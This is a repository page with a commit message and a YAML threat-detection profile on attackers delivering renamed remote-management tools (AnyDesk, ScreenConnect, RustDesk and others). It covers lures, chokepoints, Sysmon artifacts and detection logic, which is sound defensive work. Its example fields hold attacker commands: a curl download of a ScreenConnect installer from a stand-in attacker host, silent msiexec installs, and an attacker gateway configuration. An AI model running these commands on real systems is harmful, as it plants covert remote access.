Files
imposterandClaude Fable 5 ad4b5c7d16 fix(osint): every pivot card links, and links execute the displayed query
Audit of the live site found 42 OSINT pivot cards: 1 real pivot with
no URL at all (aitm-websocket-relay), and 4 whose link diverged from
the query shown on the card. Policy applied: the query on the card is
exactly what the link executes; where a platform cannot express the
query, the displayed query is rewritten to the platform's real syntax.

- aitm-websocket-relay/URLScan: original query was invalid on the
  platform (page.ip.asn is not a field; filename:*.js is a rejected
  leading wildcard). Rewritten to (page.asn:AS37963 OR page.asn:AS9009)
  AND page.status:200 AND page.mimeType:"application/javascript" -
  verified live, 1583 results as of 2026-07-13 - and URL added
- lsass/LOLDrivers: site has no deep-linkable query syntax; displayed
  query is now the free-text term to type (lsass), guidance in Notes
- lsass/ANY.RUN: ?search= URL parameter is ignored by the app
  (verified live); same free-text treatment (sekurlsa)
- edr-bypass/GitHub: link now carries the full query incl. the
  (path:*.c OR path:*.asm) qualifiers; query parenthesized
- renamed-rmm/VirusTotal: link now carries all four metadata: terms,
  not just AnyDesk
- schema/chokepoint-schema.yml: document the URL field (template had
  it, schema did not - why contributors kept omitting it)

graph-api-recon-burst's N/A card is intentional (not externally
observable) and left as-is.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01W87Fdr8vD1ZiR8jumj4Ud5
2026-07-13 18:34:31 -06:00

701 lines
38 KiB
YAML
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
Name: Renamed RMM Tools
Id: b3d5e7f9-1a2c-4b6d-8e0f-3c5a7b9d1e2f
MitreIds:
- T1219.002
Tactics:
- Initial Access
- Command and Control
Techniques:
- Remote Desktop Software
DetectionPriority: HIGH
ThreatPrevalence: HIGH
DetectionDifficulty: MEDIUM
Description: 'Legitimate RMM tools are renamed or masqueraded to appear as trusted applications (tax documents, invoices,
IT support tools) and delivered via browser download. Once executed, the RMM establishes persistent C2 to attacker infrastructure
while appearing as a signed, legitimate binary. The chokepoint: browser download, file masquerading, user execution, and
outbound connection to RMM infrastructure - all required regardless of which tool is used.
'
LastUpdated: '2026-03-07'
Author: '@iimp0ster'
Variations:
- Name: AnyDesk
FirstSeen: '2020'
Status: Declining
SourceURL: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a
NotesShort: Declining; February 2024 production breach revoked signing cert, driving actor migration
Notes: 'Common masquerade names: invoice.exe, tax_form.exe, SSN_verification.exe; February 2024 production server breach
resulted in source code and code signing certificate theft. Certificate revoked, driving threat actor migration to other
tools'
VariantId: anydesk
Command:
Invocation: "# User downloads \"Invoice_2024.exe\" via browser\n# PE metadata reveals: OriginalFilename = \"AnyDesk.exe\", Company = \"AnyDesk Software GmbH\"\n# Execution establishes C2 to *.net.anydesk.com relay\n# Attacker's AnyDesk ID connects to victim's session"
Context: 'Most common renamed RMM in 2023-2024. Filename-to-metadata mismatch is the detection signal. AnyDesk code signing cert stolen and revoked February 2024.'
Artifacts:
- 'Sysmon EID 11: Executable written to Downloads/Temp by browser process'
- 'Sysmon EID 1: Process where Image filename differs from OriginalFilename in PE header'
- 'Sysmon EID 3: Outbound to *.net.anydesk.com on 443/6568'
- 'Sysmon EID 13: AnyDesk registry keys created despite different filename'
ChokepointMapping: 'Browser download → renamed binary execution (filename differs from PE metadata) → outbound to AnyDesk relay'
- Name: TeamViewer
FirstSeen: '2019'
Status: Active
SourceURL: https://www.proofpoint.com/us/blog/threat-insight/remote-monitoring-and-management-rmm-tooling-increasingly-attackers-first-choice
NotesShort: 'Common masquerade names: update.exe, system_check.exe'
Notes: 'Common masquerade names: update.exe, system_check.exe'
VariantId: teamviewer
Command:
Invocation: "# User downloads \"Meeting_Link.exe\" or \"Support_Tool.exe\"\n# PE metadata: OriginalFilename = \"TeamViewer.exe\", Company = \"TeamViewer Germany GmbH\"\n# Establishes connection to *.teamviewer.com relay"
Context: 'One of earliest RMM tools abused for C2 (since 2019). Often delivered as IT support tool during TOAD social engineering calls.'
Artifacts:
- 'Sysmon EID 11: Executable downloaded by browser with non-TeamViewer name'
- 'Sysmon EID 1: Process where filename differs from TeamViewer PE metadata'
- 'Sysmon EID 3: Outbound to *.teamviewer.com'
ChokepointMapping: 'Browser download → renamed TeamViewer execution → outbound to teamviewer.com relay'
- Name: ScreenConnect (ConnectWise)
FirstSeen: '2022'
Status: Active
SourceURL: https://unit42.paloaltonetworks.com/connectwise-threat-brief-cve-2024-1708-cve-2024-1709/
NotesShort: Primary renamed-binary choice; CVE-2024-1709 also enables direct server exploitation
Notes: 'Common masquerade names: support_tool.exe, IT_access.exe; now primary choice for renamed-binary delivery; February
2024 CVE-2024-1709 (auth bypass) + CVE-2024-1708 (path traversal) enabled direct server exploitation by LockBit, Black
Basta, and Bl00dy. 18,188 exposed instances globally at time of disclosure; dual vector: user-delivered binary AND direct
server exploitation'
VariantId: screenconnect-connectwise
Command:
Invocation: "# User downloads \"SecurityUpdate.exe\" or \"TaxForm_2024.msi\"\n# MSI installs ScreenConnect client silently\n# Connects to attacker-controlled instance:\n# hxxps[://]attacker-instance[.]screenconnect[.]com\n# or self-hosted: hxxps[://]attacker-server[.]com:8040"
Context: 'Primary RMM in campaign use since 2022. CISA AA23-025A. CVE-2024-1709 (auth bypass) enabled direct exploitation of 18,000+ exposed instances.'
Artifacts:
- 'Sysmon EID 11: MSI/EXE downloaded by browser with campaign-themed name'
- 'Sysmon EID 1: ScreenConnect.ClientService.exe installed'
- 'Sysmon EID 3: Outbound HTTPS to *.screenconnect.com or non-standard port'
- 'Windows System EID 7045: ScreenConnect service installed'
ChokepointMapping: 'Browser download → MSI/EXE install → ScreenConnect service created → HTTPS C2 to attacker instance'
- Name: UltraViewer
FirstSeen: '2023'
Status: Active
SourceURL: https://www.seqrite.com/blog/exploiting-legitimate-remote-access-tools-in-ransomware-campaigns/
NotesShort: Low name recognition makes it credible as a disguised security tool
Notes: 'Common masquerade names: security_scan.exe, verify.exe'
VariantId: ultraviewer
Command:
Invocation: "# User downloads \"Document_Viewer.exe\"\n# PE metadata: OriginalFilename = \"UltraViewer.exe\"\n# Connects to UltraViewer relay infrastructure"
Context: 'Adopted to evade AnyDesk-specific detections. Less monitored by security tools due to lower market share.'
Artifacts:
- 'Sysmon EID 11: Executable with non-UltraViewer filename'
- 'Sysmon EID 1: Process with UltraViewer PE metadata from Downloads/Temp'
- 'Sysmon EID 3: Outbound to UltraViewer relay'
ChokepointMapping: 'Browser download → renamed UltraViewer execution → outbound to UltraViewer relay'
- Name: RustDesk
FirstSeen: '2023'
Status: Active
SourceURL: https://asec.ahnlab.com/en/84729/
NotesShort: Open-source; self-hosted infrastructure makes domain-based blocking ineffective
Notes: Open-source; self-hosted infrastructure makes domain blocking ineffective; first documented in Akira ransomware and
Scattered Spider operations mid-2023; broader adoption through 2024
VariantId: rustdesk
Command:
Invocation: "# Open-source self-hosted RMM - no vendor relay to block\n# Attacker runs their own RustDesk server\n# Victim downloads renamed rustdesk.exe\n# Config points to attacker relay: hxxps[://]attacker-relay[.]com:21116"
Context: 'Self-hosted = domain/IP blocking ineffective. Adopted by Akira and Scattered Spider. Detection must be behavioral, not domain-based.'
Artifacts:
- 'Sysmon EID 11: rustdesk.exe written with non-standard filename'
- 'Sysmon EID 1: Process with RustDesk PE metadata from unexpected path'
- 'Sysmon EID 3: Outbound to non-standard IP on port 21116/21117'
ChokepointMapping: 'Browser download → renamed rustdesk.exe execution → outbound to self-hosted relay (no vendor domain to block)'
- Name: SimpleHelp
FirstSeen: 2025-Q1
Status: Active
SourceURL: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-163a
NotesShort: Three critical CVEs exploited as ransomware initial access since January 2025
Notes: CVE-2024-57727 (path traversal), CVE-2024-57726 (privilege escalation), CVE-2024-57728 (arbitrary file upload) disclosed
January 2025; exploited in the wild since January 22, 2025 as ransomware initial access vector; DragonForce deployed via
it; CISA advisory AA25-163A issued June 2025; CISA KEV listed February 2025
VariantId: simplehelp
Command:
Invocation: "# Two attack paths:\n# Path 1: Renamed binary (social engineering) - PE metadata mismatch\n# Path 2: CVE exploitation (server-side):\n# CVE-2024-57727 (path traversal) + CVE-2024-57726 (privesc) + CVE-2024-57728 (RCE)"
Context: 'Three critical CVEs (Jan 2025) enabled exploitation of 18,000+ exposed instances. Both social engineering AND server-side paths. Used by DragonForce for ransomware.'
Artifacts:
- 'Path 1: Same as other renamed RMM (PE metadata mismatch)'
- 'Path 2: SimpleHelp server logs showing exploitation'
- 'Sysmon EID 3: Outbound from SimpleHelp client to attacker instance'
ChokepointMapping: 'Social eng delivery OR CVE exploitation → SimpleHelp session → attacker remote access'
- Name: NetSupport Manager
FirstSeen: '2019'
Status: Active
SourceURL: https://www.esentire.com/blog/unpacking-netsupport-rat-loaders-delivered-via-clickfix
NotesShort: Long-abused via ClickFix clipboard delivery; remains common in commodity phishing
Notes: Long-abused RMM (the 'NetSupport RAT' name derives from this tool); TA571 and the ClearFake cluster began ClickFix
clipboard delivery specifically in March 2024; remains one of the most common RMM payloads in commodity phishing operations
through 2025
VariantId: netsupport-manager
Command:
Invocation: "# Drops NetSupport client files to AppData or ProgramData:\n# client32.exe + client32.ini (attacker gateway config)\n# client32.ini contains:\n# [HTTP]\n# Gateway=hxxps[://]attacker-gateway[.]com"
Context: 'Legitimate remote support tool abused since 2019. Config file (client32.ini) points to attacker gateway. Often delivered via ClickFix campaigns.'
Artifacts:
- 'Sysmon EID 11: client32.exe + client32.ini written to AppData/ProgramData'
- 'Sysmon EID 1: client32.exe running from non-standard path'
- 'Sysmon EID 3: Outbound to attacker gateway (not official NetSupport infra)'
ChokepointMapping: 'Payload delivery → client32.exe + ini deployed → NetSupport connects to attacker gateway'
- Name: Atera
FirstSeen: '2022'
Status: Active
SourceURL: https://harfanglab.io/insidethelab/muddywater-rmm-campaign/
NotesShort: Used by MuddyWater in nation-state campaigns since mid-2022
Notes: Used by MuddyWater (Iran/TA450) in nation-state campaigns since mid-2022; intense campaign wave October 2023–April
2024 targeting Israeli manufacturing, tech, and infosec sectors; also deployed post-compromise as secondary RMM after
ScreenConnect CVE-2024-1709 exploitation in European targets
VariantId: atera
Command:
Invocation: "msiexec /i AteraSetup.msi /qn INTEGRATORLOGIN=attacker@email.com ACCOUNTID=<attacker_account>\n# Silent install, agent registers to attacker's Atera account"
Context: 'Cloud-based RMM. MSI registers agent to attacker Atera account. Uses legitimate Atera cloud; domain blocking difficult.'
Artifacts:
- 'Sysmon EID 1: msiexec.exe with /qn flag installing Atera MSI'
- 'Sysmon EID 11: AteraAgent.exe installed'
- 'Sysmon EID 3: Outbound to *.atera.com'
ChokepointMapping: 'MSI delivery → silent install → Atera agent registers to attacker account → cloud C2'
- Name: RMM-to-RMM Deployment
FirstSeen: '2024'
Status: Active
SourceURL: https://www.microsoft.com/en-us/security/blog/2026/03/03/signed-malware-impersonating-workplace-apps-deploys-rmm-backdoors/
NotesShort: First RMM deploys a second for redundancy; removes single point of C2 failure
Notes: 'One RMM (e.g., ScreenConnect) deploys a second RMM (e.g., AnyDesk) for redundancy. If one is removed, the other
maintains access
'
VariantId: rmm-to-rmm-deployment
Command:
Invocation: "# First RMM deploys second as backup persistence:\ncmd /c curl -o C:\\Temp\\ScreenConnect.msi hxxps[://]attacker-instance[.]screenconnect[.]com/Bin/ConnectWiseControl.ClientSetup.msi\nmsiexec /i C:\\Temp\\ScreenConnect.msi /qn"
Context: 'Pattern emerged 2024-H2. First RMM deploys second for redundancy. Documented in Hunters International campaigns (AnyDesk + ScreenConnect simultaneously).'
Artifacts:
- 'Sysmon EID 1: RMM process spawning cmd.exe → curl → msiexec'
- 'Sysmon EID 11: Second RMM installer written to disk'
- 'Sysmon EID 3: Two simultaneous outbound RMM connections to different relays'
ChokepointMapping: 'First RMM established → downloads second RMM → silent install → dual C2 channels'
MasqueradeThemes:
- Theme: Tax / IRS / W-2
EvidenceQuality: Strong
Timeframe: Seasonal (Jan–Apr); documented campaigns 2024–2025
ThreatActors:
- Financially motivated actors
- Unknown actors impersonating IRS Taxpayer Correspondence Unit
RMMsDelivered:
- SimpleHelp
- ScreenConnect
- PDQ Connect
DocumentedFilenames:
- Access-EfinViews64-offline (SimpleHelp installer)
- tax-document-2024.exe (inferred pattern)
LureDetails: 'IRS impersonation emails ("Refund Eligibility Notification", "EFIN Verification Required") direct victims
to attacker-controlled sites. Domains follow patterns like doc-irs[.]us. Microsoft documented a February 2025 wave delivering
SimpleHelp via IRS EFIN lure. Highly seasonal. Spikes January–April around US tax filing deadlines. Extend detection
with W-2, refund, enrollment pretexts during relevant periods.
'
Sources:
- Microsoft Security Blog (April 2025)
- Red Canary - four phishing lures
- NJCCIC advisories
- Theme: SSN / SSA / Social Security Verification
EvidenceQuality: Strong
Timeframe: Active 2024–2025; escalating as SSA disruption anxiety increases
ThreatActors:
- Financially motivated actors
- Unknown actors tracked by Cloudflare Force One
RMMsDelivered:
- ScreenConnect (trojanized installer)
- SimpleHelp
- Datto/CentraStage
- GoTo Technologies
DocumentedFilenames:
- Trojanized ScreenConnect installer (Cloudflare research)
LureDetails: 'Emails with subjects like "Your SSN is going to be suspended (Case ID - SSA-526487442)" direct victims to
fake SSA portals. Cloudflare Force One documented a specific campaign delivering a trojanized ScreenConnect installer
via this pretext. Threat is escalating as public awareness of SSA disruptions increases in 2025; lure credibility is
currently high. ScreenConnect delivery via this theme was confirmed by Cloudflare. Other RMM tools inferred from campaign
infrastructure overlap.
'
Sources:
- Cloudflare Force One - New SSA-themed phishing campaign installs trojanized ScreenConnect
- SC Media
- NJCCIC
- Theme: Invoice / Financial Documents
EvidenceQuality: Very Strong
Timeframe: Dominant pattern 2022–present; backbone of TOAD campaigns
ThreatActors:
- Generic cybercrime TOAD operators (10M+ attacks/month per Proofpoint 2023)
- Multiple commodity actors
RMMsDelivered:
- AnyDesk
- TeamViewer
- Zoho Assist
- UltraViewer
- NetSupport Manager
- ScreenConnect
DocumentedFilenames:
- PDF invoice lures (victim calls attacker phone number then downloads named installer)
LureDetails: 'The dominant TOAD (Telephone-Oriented Attack Delivery) pretext. Victim receives a fake invoice or subscription
renewal PDF containing a phone number. When they call, the actor directs them to download a named RMM installer. The EXE
name is typically generic (support.exe, remote.exe) rather than invoice-themed. WithSecure (November 2024) documented
PDF-delivered RMM specifically targeting France and Luxembourg via invoice/contract lures. Proofpoint estimates 67% of
global businesses were hit by a TOAD attack in 2023.
'
Sources:
- Proofpoint - RMM Tooling Increasingly an Attacker's First Choice
- Intel 471 TOAD analysis
- WithSecure - Email-Delivered RMM (November 2024)
- Mimecast threat intelligence hub
- Theme: IT Helpdesk / Technical Support
EvidenceQuality: Very Strong
Timeframe: Active 2024–present; primary high-value target vector
ThreatActors:
- Black Basta / Storm-1811
- Scattered Spider
- Generic TOAD actors
RMMsDelivered:
- Microsoft Quick Assist (native)
- AnyDesk
- ScreenConnect
DocumentedFilenames:
- Quick Assist (legitimate name)
- AnyDesk installer (legitimate name, not renamed in this vector)
LureDetails: 'Actor impersonates internal IT helpdesk via Microsoft Teams messages or email flood + phone call. Black Basta
(Storm-1811) documented by Rapid7 (May 2024) and ReliaQuest: actor sends thousands of spam emails to overwhelm victim
inbox, then calls or Teams-messages offering "help," directing the victim to install Quick Assist or AnyDesk. A Teams
+ QR code variant escalated in December 2024 (Arctic Wolf). Note: this vector typically uses legitimately-named installers
rather than renamed binaries. The social engineering replaces the masquerade. Detection must cover both renamed-binary
and IT-directed-installation patterns.
'
Sources:
- Rapid7 (May 2024)
- ReliaQuest - New Black Basta Social Engineering Scheme
- Microsoft - Quick Assist misuse (May 2024)
- Arctic Wolf (December 2024)
- Theme: Calendar Invite / Meeting Link (Teams, Zoom, Google Meet)
EvidenceQuality: Strong
Timeframe: Active 2023–present; significant escalation documented March 2026
ThreatActors:
- Unknown financially motivated actor (Microsoft Defender Experts, Feb 2026)
- Netskope-tracked campaign
- DarkGate operators
RMMsDelivered:
- ScreenConnect
- Tactical RMM
- MeshAgent
- Datto RMM
- LogMeIn Unattended
- Atera
DocumentedFilenames:
- MicrosoftTeams.msi (confirmed)
- Files named after Teams/Zoom/Adobe/Google Meet
- Party Card Viewer MSI
- E-Invite MSI
LureDetails: 'Fake meeting invites or calendar links direct victims to attacker-controlled download pages serving RMM installers
with legitimate-looking names. Microsoft Defender Experts (March 2026) documented signed malware (EV certificate: "TrustConnect
Software PTY LTD") impersonating Teams, Zoom, Adobe, and Google Meet, delivering ScreenConnect, Tactical RMM, and MeshAgent.
Red Canary documented "Party Card Viewer" and "E-Invite" MSI files delivering Atera. Check Point (December 2024) documented
Google Calendar-delivered phishing targeting 300+ organizations (4,000+ emails). The EV code signing certificate is a
critical evasion element. Signed MSI files pass many endpoint controls.
'
Sources:
- Microsoft Security Blog - Signed malware impersonating workplace apps (March 2026)
- Red Canary - four phishing lures
- Netskope - Attackers Weaponize Signed RMM Tools
- Check Point (December 2024)
- Theme: Software / App Update Masquerade (Chrome, Windows, Adobe)
EvidenceQuality: Strong
Timeframe: Active 2023–present; SocGholish/FakeUpdates cluster ongoing
ThreatActors:
- SocGholish / FakeUpdates cluster
- Microsoft Defender Experts-tracked actors (2026)
RMMsDelivered:
- NetSupport Manager (FakeUpdates primary payload)
- ITarian
- PDQ
- SimpleHelp
- Atera
- ScreenConnect
- Tactical RMM
- MeshAgent
DocumentedFilenames:
- chrome_update.exe (inferred pattern)
- Signed MSIs named after Teams/Zoom/Acrobat/Google Meet (Microsoft March 2026 research)
LureDetails: 'Compromised legitimate websites (sports, healthcare) inject fake browser update banners redirecting to attacker-controlled
download pages. FakeUpdates/SocGholish has delivered NetSupport Manager via this vector since at least 2023. The March
2026 Microsoft research documents an evolution: EV-signed MSIs impersonating workplace apps (Teams, Zoom, Adobe Acrobat,
Google Meet) served from domains like chromus[.]icu and mypanelsuper[.]online. The EV code signing certificate ("TrustConnect
Software PTY LTD") allows the payload to bypass many endpoint controls. Red Canary identifies fake software updates as
one of the four primary RMM delivery lure categories.
'
Sources:
- Microsoft Security Blog - Signed malware impersonating workplace apps (March 2026)
- Red Canary - four phishing lures
- Hackread
- Blackpoint Cyber APG research
- Theme: HR / Onboarding / Payroll
EvidenceQuality: Moderate
Timeframe: Documented; less common than IT support or invoice lures for RMM delivery
ThreatActors:
- Unknown actors (Mimecast research)
RMMsDelivered:
- Unspecified RMMs (Mimecast documents shift from credential harvesting to RMM delivery)
DocumentedFilenames:
- DocuSign/e-signature spoofs (more commonly credential harvesters, not RMM)
LureDetails: 'HR impersonation emails (salary review, benefits enrollment, onboarding portal) deliver RMM tools. Mimecast
specifically documented a campaign shift from credential harvesting to RMM tool deployment via HR-themed lures. This pretext
is less common than IT support or invoice lures for RMM delivery. HR themes more frequently deliver credential harvesters
or document-based malware. When RMM delivery does occur, it typically involves DocuSign spoofs or "sign your employment
documents" pretexts directing victims to a download.
'
Sources:
- Mimecast - HR-Themed Cyberattack Campaign Shifts from Credential Harvesting to RMM Tool Deployment
- Proofpoint salary/bonus lure research
- Theme: Security Alert / Verification
EvidenceQuality: Moderate
Timeframe: Active; strongest evidence in SSA 'suspicious activity' variant
ThreatActors:
- Cloudflare-tracked actors (SSA variant)
- Tech support scam operators
RMMsDelivered:
- ScreenConnect (SSA 'suspicious activity' variant)
- AnyDesk
- UltraViewer
DocumentedFilenames:
- security_scan.exe (inferred from UltraViewer campaign context)
- verify.exe (inferred)
LureDetails: '"Suspicious activity detected on your account" emails direct victims to verify identity by downloading a "security
tool." The SSA variant (Cloudflare research) is the best-documented instance of this pretext delivering an RMM. Generic
"antivirus update" or "security scan" framing is more common in tech-support-scam contexts (where the victim calls a number)
than in phishing-email RMM delivery. UltraViewer''s low name recognition makes it particularly credible as a disguised
"security tool." The fake Chrome update sites (SocGholish) also sometimes use security-themed UI.
'
Sources:
- Cloudflare Force One - SSA-themed ScreenConnect campaign
- Red Canary - fake update pages with security framing
Prerequisites:
- User account can execute binaries from browser download paths (Downloads, Temp, AppData)
- RMM binary carries a valid vendor code-signing certificate; hash-based detection does not fire
Chokepoints:
- Stage: Browser Download
Input: User clicks a link or is directed to download a file from an attacker-controlled or compromised site
Invariant: Browser process creates an executable in a user-writable path (Downloads, Temp, AppData) with a campaign-themed
or generic filename masking RMM software
Observable: 'Sysmon EID 11 showing browser process (chrome.exe, msedge.exe) writing an executable to Downloads/Temp.
File hash matches a known RMM tool despite the campaign-themed filename.'
WhyCantBypass: The binary must land on disk before execution. No in-memory-only path exists for the initial delivery of
a standalone RMM installer; the file must be hosted on an attacker-controlled or compromised site reachable by the victim's
browser, so delivery cannot be skipped in any variant including TOAD phone-assisted delivery
LogSources:
- Sysmon Event ID 11 (File Creation)
- Browser download telemetry
DetectionTier: Hunt
SigmaRef: sigma-rules/renamed-rmm/hunt.yml
- Stage: User Execution
Input: RMM binary exists on disk with a masqueraded filename
Invariant: User executes the downloaded binary, which is a legitimately-signed RMM tool regardless of its filename. PE
metadata (OriginalFilename, Company) betrays the mismatch
Observable: 'Sysmon EID 1 showing process creation where Image filename differs from PE OriginalFilename metadata.
For example: Image=tax_form.exe but OriginalFilename=AnyDesk.exe or Company=philandro Software GmbH.'
WhyCantBypass: The binary must execute to establish C2. No execution means no remote access regardless of delivery success
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Windows Security Event ID 4688 (Process Creation)
DetectionTier: Analyst
SigmaRef: sigma-rules/renamed-rmm/analyst.yml
BypassNote: CVE exploitation of internet-exposed RMM servers (ScreenConnect CVE-2024-1709, SimpleHelp CVE-2024-57727) bypasses
all user-execution detection. Monitor RMM server process telemetry separately
- Stage: Outbound RMM Connection
Input: RMM process is running on the endpoint
Invariant: Executed binary establishes a persistent connection to RMM relay or attacker-controlled server on standard HTTPS
ports
Observable: 'Sysmon EID 3 showing outbound HTTPS connection from a process whose Image path is in a user-writable
directory to known RMM relay domains or self-hosted infrastructure.'
WhyCantBypass: The C2 channel must be established. The entire purpose of RMM tool deployment is persistent remote access
LogSources:
- Sysmon Event ID 3 (Network Connection)
- Firewall / proxy egress logs
DetectionTier: Analyst
SigmaRef: sigma-rules/renamed-rmm/analyst.yml
BypassNote: Self-hosted RMM infrastructure (RustDesk, MeshCentral) makes domain-based blocking ineffective. Detect by behavior
(browser download + execution + outbound), not by destination
EvolutionTimeline:
- Date: '2019'
Event: TeamViewer and AnyDesk adoption in social engineering campaigns
Change: Legitimate RMM binaries adopted as initial access alternative to malware; signed binaries evade hash-based detection.
DetectionImpact: New pattern. Signed binaries evading hash-based detection
Variants: []
EventType: event
- Date: 2022-Q3
Event: ScreenConnect becomes primary campaign tool
Change: Shift to ConnectWise ScreenConnect for professional appearance; CISA AA23-025A documents first large-scale malicious
campaigns.
DetectionImpact: No change to core detection pattern
Variants: []
EventType: event
- Date: '2023'
Event: UltraViewer campaigns emerge
Change: Shift to less-known tools to evade AnyDesk-specific detections; tool-agnostic detection becomes critical.
DetectionImpact: Tool-agnostic detection becomes critical; vendor name can no longer be relied on
Variants: []
EventType: event
- Date: 2024-Q1
Event: AnyDesk breach + ScreenConnect mass CVE exploitation
Change: AnyDesk code signing cert stolen and revoked; CVE-2024-1709 enables direct exploitation of 18,000+ exposed ScreenConnect
instances by ransomware groups.
DetectionImpact: Browser-download detection insufficient for direct server exploitation; must also monitor RMM server processes
for unexpected outbound sessions and lateral movement
Variants: []
EventType: event
- Date: '2023'
Event: RustDesk adoption as self-hosted alternative
Change: Open-source self-hosted RMM adopted in Akira and Scattered Spider operations; domain-based blocking no longer effective.
DetectionImpact: Domain/IP-based blocking bypassed; behavior detection essential
Variants: []
EventType: event
- Date: 2025-Q1
Event: SimpleHelp CVE exploitation as ransomware initial access
Change: Three critical SimpleHelp CVEs (CVE-2024-57727/57726/57728) exploited by ransomware actors beginning January 2025
as a server-side initial access vector.
DetectionImpact: RMM server vulnerability exploitation requires monitoring of RMM server logs and network egress, not just
endpoint process/file telemetry
Variants: []
EventType: event
- Date: 2024-H2
Event: RMM-to-RMM deployment pattern emerges
Change: First RMM used to deploy a second as backup persistence; Hunters International documented AnyDesk + ScreenConnect
deployed simultaneously.
DetectionImpact: Process creation chain detection required; single-RMM detection insufficient
Variants: []
EventType: event
Detections:
- Level: Research
Description: Identify all RMM tool processes running in the environment
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Windows Security Event ID 4688 (Process Creation)
- Application inventory / software management telemetry
Logic: 'Process name matches known RMM binaries: anydesk.exe, screenconnect*.exe, teamviewer*.exe, ultraviewer.exe, rustdesk.exe, meshagent.exe, connectwisecontrol*.exe.'
ExpectedFPRate: High
UseCase: Asset inventory; baseline of legitimate RMM usage by IT staff
SigmaRule: sigma-rules/renamed-rmm/research.yml
- Level: Hunt
Description: Detect RMM tool binaries downloaded via browser and executed within minutes
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Sysmon Event ID 11 (File Creation)
- Browser download telemetry
Logic: '*.exe file created by a browser (chrome, firefox, msedge, iexplore, brave) in \Downloads\, \Temp\, or \AppData\Local\Temp\, then executed within 5 minutes, where product metadata or OriginalFilename matches a known RMM vendor.'
ExpectedFPRate: Medium
UseCase: Hunt for user-initiated RMM downloads; distinguishes IT-deployed from user-downloaded
SigmaRule: sigma-rules/renamed-rmm/hunt.yml
- Level: Analyst
Description: Masqueraded RMM tool with campaign-themed name, downloaded by browser, with immediate outbound connection
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Sysmon Event ID 3 (Network Connection)
- Sysmon Event ID 11 (File Creation)
- File metadata / version info analysis
Logic: 'Browser-dropped *.exe (per Hunt logic) AND one of: file name contains tax, invoice, SSN, SSA, support, verify, or secure; OR OriginalFilename = anydesk.exe (or other RMM) while current name differs; OR file signed by a known RMM vendor but renamed. Fires on outbound to RMM infrastructure within 2 minutes of execution from a standard user account (not IT admin).'
ExpectedFPRate: Low
UseCase: SOC alerting; campaign-themed file name detection catches targeted pretexts
SigmaRule: sigma-rules/renamed-rmm/analyst.yml
Intel:
- Name: CISA AA23-025A - Protecting Against Malicious Use of RMM Software
Tier: primary
URL: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a
Description: Foundational joint advisory from CISA, NSA, and MS-ISAC documenting malicious RMM use; specifically covers
portable executable delivery bypassing software installation controls, AnyDesk and ScreenConnect campaign mechanics
- Name: Huntress - A Series of Unfortunate (RMM) Events
Tier: primary
URL: https://www.huntress.com/blog/series-of-unfortunate-rmm-events
Description: Covers RMM-to-RMM chaining, detection evasion patterns, and the broader RMM abuse landscape from an MSP incident
response perspective
LinkedFrom:
- RMM-to-RMM Deployment
- Name: 'Microsoft - Keys to the kingdom: RMM exploits enabling human-operated intrusions in 2024–25'
Tier: primary
URL: https://techcommunity.microsoft.com/blog/microsoftsecurityexperts/keys-to-the-kingdom-rmm-exploits-enabling-human-operated-intrusions-in-2024%E2%80%9325/4410903
Description: Microsoft Security Experts analysis of RMM exploitation patterns across incident response engagements; covers
both social engineering delivery and direct CVE exploitation vectors
- Name: MITRE ATT&CK - T1219.002 Remote Desktop Software
Tier: primary
URL: https://attack.mitre.org/techniques/T1219/002/
Description: Technique definition, procedure examples including RMM tool abuse, and detection guidance for remote desktop
software used as C2
RelatedChokepoints:
- clickfix-techniques
- remote-execution-tools
OsintSources:
- Platform: URLScan
Query: 'filename:MicrosoftTeams.msi OR filename:chrome_update.exe OR filename:security_scan.exe OR filename:verify.exe OR filename:support.exe'
URL: https://urlscan.io/search/#filename%3AMicrosoftTeams.msi%20OR%20filename%3Achrome_update.exe%20OR%20filename%3Asecurity_scan.exe%20OR%20filename%3Averify.exe%20OR%20filename%3Asupport.exe
Notes: 'Targets documented masquerade filenames used in renamed RMM campaigns, including fake Teams installers
(March 2026 signed malware campaign), fake Chrome updates (SocGholish/FakeUpdates), and security/support
themed binaries (UltraViewer campaigns). Rotate with seasonal themes: tax-document, invoice, SSN,
E-Invite, Party Card Viewer during relevant periods.'
- Platform: Shodan
Query: product:"ScreenConnect"
URL: https://www.shodan.io/search?query=product%3A%22ScreenConnect%22
Notes: Find internet-exposed ScreenConnect instances; cross-reference against known legitimate MSP infrastructure to identify
attacker-controlled deployments.
- Platform: Censys
Query: 'services.tls.certificate.parsed.subject.common_name: "SimpleHelp"'
URL: https://search.censys.io/search?resource=hosts&q=services.tls.certificate.parsed.subject.common_name%3A+%22SimpleHelp%22
Notes: Finds infrastructure presenting SimpleHelp TLS certificates; currently the most actively exploited RMM platform
per CISA AA25-163A.
- Platform: VirusTotal Intelligence
Query: have:itw tag:peexe (metadata:"AnyDesk" OR metadata:"ScreenConnect" OR metadata:"SimpleHelp" OR metadata:"NetSupport")
URL: https://www.virustotal.com/gui/search/have%3Aitw%20tag%3Apeexe%20%28metadata%3A%22AnyDesk%22%20OR%20metadata%3A%22ScreenConnect%22%20OR%20metadata%3A%22SimpleHelp%22%20OR%20metadata%3A%22NetSupport%22%29
Notes: Requires VT Intelligence subscription; finds PE executables in the wild whose internal metadata references known
RMM vendors; the core renamed-binary delivery mechanism.
- Platform: LOLRMM
URL: https://lolrmm.io
Notes: Community-maintained catalog of every known RMM tool with file metadata, network indicators, and detection heuristics
for building renamed-binary analyst rules.
KnownBypasses:
- Bypass: Legitimate business use of the same RMM tool
Mitigation: Maintain an allowlist of IT-approved RMM instances and authorized source IPs.
- Bypass: Self-hosted RMM infrastructure (RustDesk, MeshCentral)
Mitigation: Apply network-level egress filtering by traffic pattern rather than destination domain.
- Bypass: Legitimate-looking file names matching IT asset naming conventions
Mitigation: Combine filename detection with PE metadata mismatch (OriginalFilename vs. actual name).
- Bypass: CVE exploitation of internet-exposed RMM servers (no user interaction required)
